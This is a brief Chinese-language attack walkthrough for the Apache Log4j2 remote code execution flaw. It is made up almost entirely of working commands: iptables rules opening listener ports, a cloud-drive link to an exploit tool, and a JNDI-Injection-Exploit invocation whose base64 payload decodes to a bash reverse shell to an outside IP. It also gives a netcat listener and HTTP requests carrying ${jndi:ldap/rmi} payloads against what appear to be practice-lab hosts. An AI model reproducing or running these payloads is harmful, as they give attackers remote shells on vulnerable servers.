Apache Log4j2 远程代码执行

Apache Log4j2 远程代码执行

iptables -I INPUT -p tcp --dport 9999 -j ACCEPT

iptables -I INPUT -p tcp --dport 1099 -j ACCEPT

iptables -I INPUT -p tcp --dport 8180 -j ACCEPT

iptables -I INPUT -p tcp --dport 1389 -j ACCEPT

工具

链接：百度网盘 请输入提取码

提取码：6ldj

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDQuMjM4LjE4OS45OS85OTk5IDA+JjE=}|{base64,-d}|{bash,-i}" -A "104.238.189.99"

nc -lvvp 9999

数据包

POST /hello HTTP/1.1
Host: vulfocus.fofa.so:58779
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

payload=${jndi:rmi://104.238.189.99:1099/yh0w11}

POST /zkaq/log4jrce HTTP/1.1
Host: d63bb2586.lab.aqlab.cn
Content-Length: 111
Content-Type: application/x-www-form-urlencoded

{"username":"${jndi:ldap://104.238.189.99:1389/56p8fr}","password":"${jndi:ldap://104.238.189.99:1389/56p8fr}"}